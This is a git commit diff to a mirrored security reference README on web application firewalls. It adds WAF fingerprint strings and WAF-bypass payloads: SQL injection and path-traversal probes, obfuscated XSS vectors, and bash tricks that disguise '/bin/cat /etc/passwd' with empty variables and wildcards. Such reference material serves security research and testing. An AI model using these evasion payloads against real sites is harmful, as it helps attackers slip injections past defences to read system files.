mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2025-01-03 13:30:03 +07:00
Added more bypass techniques
This commit is contained in:
parent
31b5db62b4
commit
4bb21ba6b9
92
README.md
92
README.md
@ -58,15 +58,18 @@ Feel free to [contribute](CONTRIBUTING.md).
|
|||||||
- Other WAFs reply with unusual response codes upon malicious requests (eg. WebKnight, 360 WAF).
|
- Other WAFs reply with unusual response codes upon malicious requests (eg. WebKnight, 360 WAF).
|
||||||
|
|
||||||
### Detection Techniques:
|
### Detection Techniques:
|
||||||
|
To identify WAFs, we need to (dummy) provoke it.
|
||||||
1. Make a normal GET request from a browser, intercept and test response headers (specifically cookies).
|
1. Make a normal GET request from a browser, intercept and test response headers (specifically cookies).
|
||||||
2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
|
2. Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
|
||||||
3. If there is a login page somewhere, try some common (easily detectable) payloads like `' or 1 = 1 --`.
|
3. If there is a login page somewhere, try some common (easily detectable) payloads like `" or 1 = 1 --`.
|
||||||
4. If there is some input field somewhere, try with noisy payloads like `<script>alert()</script>`.
|
4. If there is some input field somewhere, try with noisy payloads like `<script>alert()</script>`.
|
||||||
5. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).
|
5. Attach a dummy `../../../etc/passwd` to a random parameter at end of URL.
|
||||||
6. Many a times, the WAF varies the `Server` header upon different types of interactions.
|
6. Append some catchy keywords like `' OR SLEEP(5) OR '` at end of URLs to any random parameter.
|
||||||
7. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
|
6. Make GET requests with outdated protocols like `HTTP/0.9` (`HTTP/0.9` does not support POST type queries).
|
||||||
|
7. Many a times, the WAF varies the `Server` header upon different types of interactions.
|
||||||
|
8. Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
|
||||||
> __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).
|
> __Tip:__ This method could be easily achieved with tools like [HPing3](http://www.hping.org) or [Scapy](https://scapy.net).
|
||||||
8. Side Channel Attacks - Examine the timing behaviour of the request and response content.
|
9. Side Channel Attacks - Examine the timing behaviour of the request and response content.
|
||||||
|
|
||||||
## WAF Fingerprints
|
## WAF Fingerprints
|
||||||
Wanna detect WAFs? Lets see how.
|
Wanna detect WAFs? Lets see how.
|
||||||
@ -84,7 +87,11 @@ Wanna detect WAFs? Lets see how.
|
|||||||
<ul>
|
<ul>
|
||||||
<li>Returns status code <code>493</code> upon unusual requests.</li>
|
<li>Returns status code <code>493</code> upon unusual requests.</li>
|
||||||
<li>On viewing source-code of error page, you will find reference to <code>wzws-waf-cgi/</code> directory.</li>
|
<li>On viewing source-code of error page, you will find reference to <code>wzws-waf-cgi/</code> directory.</li>
|
||||||
<li>Source code may contain reference to <code>wangshan.360.cn</code> URL.</li>
|
<li>Blocked response page source may contain:
|
||||||
|
<ul>
|
||||||
|
<li>Reference to <code>wangshan.360.cn</code> URL.</li>
|
||||||
|
<li><code>Sorry! Your access has been intercepted</code> text snippet.</li>
|
||||||
|
</ul>
|
||||||
<li>Response headers contain <code>X-Powered-By-360WZB</code> Header.</li>
|
<li>Response headers contain <code>X-Powered-By-360WZB</code> Header.</li>
|
||||||
</ul>
|
</ul>
|
||||||
</ul>
|
</ul>
|
||||||
@ -638,6 +645,7 @@ Wanna detect WAFs? Lets see how.
|
|||||||
<ul>
|
<ul>
|
||||||
<li>Blocked response page content may contain:</li>
|
<li>Blocked response page content may contain:</li>
|
||||||
<ul>
|
<ul>
|
||||||
|
<li><code>Powered By Incapsula</code> text snippet.</li>
|
||||||
<li><code>Incapsula incident ID</code> keyword.</li>
|
<li><code>Incapsula incident ID</code> keyword.</li>
|
||||||
<li><code>_Incapsula_Resource</code> keyword.</li>
|
<li><code>_Incapsula_Resource</code> keyword.</li>
|
||||||
<li><code>subject=WAF Block Page</code> keyword.</li>
|
<li><code>subject=WAF Block Page</code> keyword.</li>
|
||||||
@ -1245,7 +1253,7 @@ Wanna detect WAFs? Lets see how.
|
|||||||
<li><b>Detectability: </b>Easy</li>
|
<li><b>Detectability: </b>Easy</li>
|
||||||
<li><b>Detection Methodology:</b></li>
|
<li><b>Detection Methodology:</b></li>
|
||||||
<ul>
|
<ul>
|
||||||
<li>Response headers may contain <code>Sucuri</code> or <code>Cloudproxy</code> values.</li>
|
<li>Response headers may contain <code>Sucuri</code> or <code>Cloudproxy</code> keywords.</li>
|
||||||
<li>Blocked response page contains the following text snippet:</li>
|
<li>Blocked response page contains the following text snippet:</li>
|
||||||
<ul>
|
<ul>
|
||||||
<li><code>Access Denied</code> and <code>Sucuri Website Firewall</code> texts.</li>
|
<li><code>Access Denied</code> and <code>Sucuri Website Firewall</code> texts.</li>
|
||||||
@ -1362,7 +1370,7 @@ Wanna detect WAFs? Lets see how.
|
|||||||
<li>Response page contains:</li>
|
<li>Response page contains:</li>
|
||||||
<ul>
|
<ul>
|
||||||
<li><code>http://cdn.virusdie.ru/splash/firewallstop.png</code> picture.</li>
|
<li><code>http://cdn.virusdie.ru/splash/firewallstop.png</code> picture.</li>
|
||||||
<li><code>copy; Virusdie.ru</p></code> text snippet.</li>
|
<li><code>copy; Virusdie.ru</p></code> copyright notice.</li>
|
||||||
<li>Response page title contains <code>Virusdie</code> keyword.</li>
|
<li>Response page title contains <code>Virusdie</code> keyword.</li>
|
||||||
<li>Page metadata contains <code>name="FW_BLOCK"</code> keyword</li>
|
<li>Page metadata contains <code>name="FW_BLOCK"</code> keyword</li>
|
||||||
</ul>
|
</ul>
|
||||||
@ -1418,6 +1426,27 @@ Wanna detect WAFs? Lets see how.
|
|||||||
</ul>
|
</ul>
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
<tr>
|
||||||
|
<td>
|
||||||
|
Wordfence (Feedjit)
|
||||||
|
</td>
|
||||||
|
<td>
|
||||||
|
<ul>
|
||||||
|
<li><b>Detectability: </b>Easy</li>
|
||||||
|
<li><b>Detection Methodology:</b></li>
|
||||||
|
<ul>
|
||||||
|
<li>Response headers contain <code>WebKnight</code> keyword.</li>
|
||||||
|
<li>Blocked response page contains:</li>
|
||||||
|
<ul>
|
||||||
|
<li><code>Generated by Wordfence</code> text snippet.</li>
|
||||||
|
<li><code>A potentially unsafe operation has been detected in your request to this site</code> text warning.</li>
|
||||||
|
<li><code>Your access to this site has been limited</code> text warning.</li>
|
||||||
|
<li><code>This response was generated by Wordfence</code> text snippet.</li>
|
||||||
|
</ul>
|
||||||
|
</ul>
|
||||||
|
</ul>
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
<tr>
|
<tr>
|
||||||
<td>
|
<td>
|
||||||
WP Cerber Firewall
|
WP Cerber Firewall
|
||||||
@ -1658,8 +1687,11 @@ __9. String Concatenation__
|
|||||||
- Different programming languages have different syntaxes and patterns for concatenation.
|
- Different programming languages have different syntaxes and patterns for concatenation.
|
||||||
- This allows us to effectively generate payloads that can bypass many filters and rules.
|
- This allows us to effectively generate payloads that can bypass many filters and rules.
|
||||||
|
|
||||||
|
__Standard__: `<svg/onload-location=javascript:alert%281%29;//`
|
||||||
|
__Obfuscated__: `<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//`
|
||||||
|
|
||||||
__Standard__: `/bin/cat /etc/passwd`
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
__Obfuscated__: `/bi'n/c'at' /e'tc'/pa'''ss'wd`
|
__Obfuscated__: `/bi'n'''/c''at' /e'tc'/pa'''ss'wd`
|
||||||
> Bash allows path concatenation for execution.
|
> Bash allows path concatenation for execution.
|
||||||
|
|
||||||
__Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>`
|
__Standard__: `<iframe/onload='this["src"]="javascript:alert()"';>`
|
||||||
@ -1677,10 +1709,7 @@ __Standard__: `<BODY onload=alert()>`
|
|||||||
__Obfuscated__: ```<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>```
|
__Obfuscated__: ```<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>```
|
||||||
|
|
||||||
__Standard__: `<a href=javascript;alert()>ClickMe `
|
__Standard__: `<a href=javascript;alert()>ClickMe `
|
||||||
__Bypassed__:
|
__Bypassed__: `<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe`
|
||||||
```
|
|
||||||
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
|
|
||||||
```
|
|
||||||
|
|
||||||
__10. Line Breaks__
|
__10. Line Breaks__
|
||||||
- Many WAF with regex based filtering effectively blocks many attempts.
|
- Many WAF with regex based filtering effectively blocks many attempts.
|
||||||
@ -1690,12 +1719,27 @@ __Standard__: `<iframe src=javascript:alert(0)">`
|
|||||||
__Obfuscated__: `<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)">`
|
__Obfuscated__: `<iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aalert(0)">`
|
||||||
|
|
||||||
__11. Uninitialized Variables__
|
__11. Uninitialized Variables__
|
||||||
- Uninitialized bash variables can elude regular expression based filters and pattern match.
|
- Uninitialized bash variables can evade bad regular expression based filters and pattern match.
|
||||||
- Uninitialised variables have value null/they act like empty strings.
|
- Uninitialised variables have value null/they act like empty strings.
|
||||||
- Both bash and perl allow this kind of interpretations.
|
- Both bash and perl allow this kind of interpretations.
|
||||||
|
|
||||||
__Standard__: `cat /etc/passwd`
|
> __BONUS:__ Variable names can have any number of random characters. I have represented them here as `$aaaaaa`, `$bbbbbb`, and so on. You can replace them with any number of random chars like `$ushdjah` and so on. ;)
|
||||||
__Obfuscated__: `cat$u $u/etc$u/passwd$u`
|
|
||||||
|
Level 1 Obfuscation: Normal
|
||||||
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
|
__Obfuscated__: `/bin/cat$u /etc/passwd$u`
|
||||||
|
|
||||||
|
Level 2 Obfuscation: Postion Based
|
||||||
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
|
__Obfuscated__: <code>$u<b>/bin</b>$u<b>/cat</b>$u $u<b>/etc</b>$u<b>/passwd</b>$u</code>
|
||||||
|
|
||||||
|
Level 3 Obfuscation: Random chars
|
||||||
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
|
__Obfuscated__: <code>$aaaaaa<b>/bin</b>$bbbbbb<b>/cat</b>$ccccccc $dddddd<b>/etc</b>$eeeeeee<b>/passwd</b>$fffffff</code>
|
||||||
|
|
||||||
|
Level 4 Obfuscation: Wildcard paranoid
|
||||||
|
__Standard__: `/bin/cat /etc/passwd`
|
||||||
|
__Obfuscated__: <code>$aaaaaa<b>/???</b>$bbbbbb<b>/??t</b>$ccccccc $dddddd<b>/???</b>$eeeeeee<b>/??ss??</b>$fffffff</code>
|
||||||
|
|
||||||
__12. Random Tabs__
|
__12. Random Tabs__
|
||||||
- Tabs often help to evade firewalls especially regex based ones.
|
- Tabs often help to evade firewalls especially regex based ones.
|
||||||
@ -1726,9 +1770,7 @@ Accept-Language: en-US,en;q=0.5
|
|||||||
Accept-Encoding: gzip, deflate
|
Accept-Encoding: gzip, deflate
|
||||||
</pre>
|
</pre>
|
||||||
When the site loads, it will be encoded to the UTF-32 encoding that we set, and
|
When the site loads, it will be encoded to the UTF-32 encoding that we set, and
|
||||||
then as the output encoding of the page is utf-8, it will be rendered as: `"<script>alert (1) </ script>`.
|
then as the output encoding of the page is UTF-8, it will be rendered as: `<svg/onload=alert()>` which will trigger XSS.
|
||||||
|
|
||||||
Final URL encoded payload: `%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80`
|
|
||||||
|
|
||||||
#### Null Bytes:
|
#### Null Bytes:
|
||||||
- The null bytes are commonly used as string terminator.
|
- The null bytes are commonly used as string terminator.
|
||||||
@ -2076,19 +2118,19 @@ User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
|
|||||||
### Fingerprinting:
|
### Fingerprinting:
|
||||||
__1. Fingerprinting with [NMap](https://nmap.org)__:
|
__1. Fingerprinting with [NMap](https://nmap.org)__:
|
||||||
Source: [GitHub](https://github.com/nmap/nmap) | [SVN](http://svn.nmap.org)
|
Source: [GitHub](https://github.com/nmap/nmap) | [SVN](http://svn.nmap.org)
|
||||||
- Normal WAF Fingerprinting
|
- Normal WAF fingerprinting
|
||||||
`nmap --script=http-waf-fingerprint <target>`
|
`nmap --script=http-waf-fingerprint <target>`
|
||||||
|
|
||||||
- Intensive WAF Fingerprinting
|
- Intensive WAF fingerprinting
|
||||||
`nmap --script=http-waf-fingerprint --script-args http-waf-fingerprint.intensive=1 <target>`
|
`nmap --script=http-waf-fingerprint --script-args http-waf-fingerprint.intensive=1 <target>`
|
||||||
|
|
||||||
- Generic Detection
|
- Generic detection
|
||||||
` nmap --script=http-waf-detect <target>`
|
` nmap --script=http-waf-detect <target>`
|
||||||
|
|
||||||
__2. Fingerprinting with [WafW00f](https://github.com/EnableSecurity/wafw00f)__:
|
__2. Fingerprinting with [identYwaf](https://github.com/stamparm/identywaf)__:
|
||||||
Source: [GitHub](https://github.com/enablesecurity/wafw00f) | [Pypi](https://pypi.org/project/wafw00f)
|
Source: [GitHub](https://github.com/stamparm/identywaf)
|
||||||
```
|
```
|
||||||
wafw00f <target>
|
python identYwaf.py --delay=2 --proxy=<proxy> <target>
|
||||||
```
|
```
|
||||||
|
|
||||||
### Testing:
|
### Testing:
|
||||||
|
Loading…
Reference in New Issue
Block a user